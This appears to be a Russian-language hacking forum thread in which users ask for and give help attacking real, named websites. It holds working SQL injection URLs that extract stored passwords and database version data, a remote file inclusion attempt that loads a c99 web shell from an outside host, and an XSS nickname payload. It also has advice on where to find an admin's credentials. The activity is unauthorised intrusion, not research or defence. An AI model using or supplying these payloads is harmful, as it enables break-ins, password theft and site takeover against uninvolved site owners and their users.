да это я так.. случайно... просто перебирал может больше может и меньше ну знаешь иногда такое бывает ну так и скопировал наверно!... так то сначала 19 пробовал!
подскажите пож. вот сайт я его ломанул вот только 2 вопроса что с пасами они неправельно выглядят , и 2 есть ли там мыло админа и как узнать его ник ? а да вот сайт http://tass-ural.ru/news/?id=-47468+union+select+1,pass,3,4,5,6,7,8,9,10,11,12,13,14+FROM+subscribe--
1. C пассами всё нормально, они зашифрованы. Думаю, что это aes_encrypt обычный, хотя может и самопис какой 2. Врятли пароль в базе, скорее всего он в хтпассворд каком-нибудь http://tass-ural.ru/admin/
Прилагаются к сипт + очень часто попадаются переводы этих слов на другие языки. Можно сгенерить хорошую базу.
ну вы че за ламера меня совсем держите)? Знаю я про стандартный словарик. Он маленький и нашел ток одну табличку) и 0 полей в ней. Язык англ нада - без префиксов.
Вопрос: http://www.shu.ru/index.php?id=27;select+version()::int-- Подбор колонок никак не получается. Ни нуллом, ни числом, ни ордером. Хелп.
http://www.shu.ru/index.php?id=27/**/UNION/**/SELECT/**/null,null,CAST(version()/**/AS/**/text),null,null,null--
Почему не удается шелл подключить =( http://www.npithub.com/index.php?fname=http://wowbkdo.narod.ru/c99madshell.php Хотя так сайт внутри открывается =( http://www.npithub.com/index.php?fname=http://wowbkdo.narod.ru/
вопрос по XSS вот сцыль на регистрацию на неком ресурсе если в поле никнейма написать некторый js код, к примеру и нажать на зарегиться то, данный js код сработает, но рега конечно непройдет (не в этом суть) Получаеться вроде как пассивная XSS, либо в силу своего незнания либо в силу нестандартности разработчик, вобщем я так и непонял как перадть параметр никнейм через адресную строку. Из кода ясно что переменная не передаеться не как POST не как GET, и ваще его не скрипт обрабатывает а проста HTML. И что получаеться это и вовсе не уязвимость ? --------------------------- прошу неспалить это на их сайте массовой попыткой реги таких ников ))
после того как пытаешся зарег-тся под ником "><script>alert("xss")</script> скрипт проверяет его длину (от 4 до 20 символов). если его длина не входит в рамки ограничений то выводит к примеру ник $_POST['nick'](ему передано значение "><script>alert("xss")</script> и по этому вылазит окно.Там не стоит htmlspecialchars()) имеет длину больше 20 символов. >>Из кода ясно что переменная не передаеться не как POST не как GET данные передаються методом POST HTML: <form method="POST" >>И что получаеться это и вовсе не уязвимость ? уязвимость но с нее в данном случае толку 0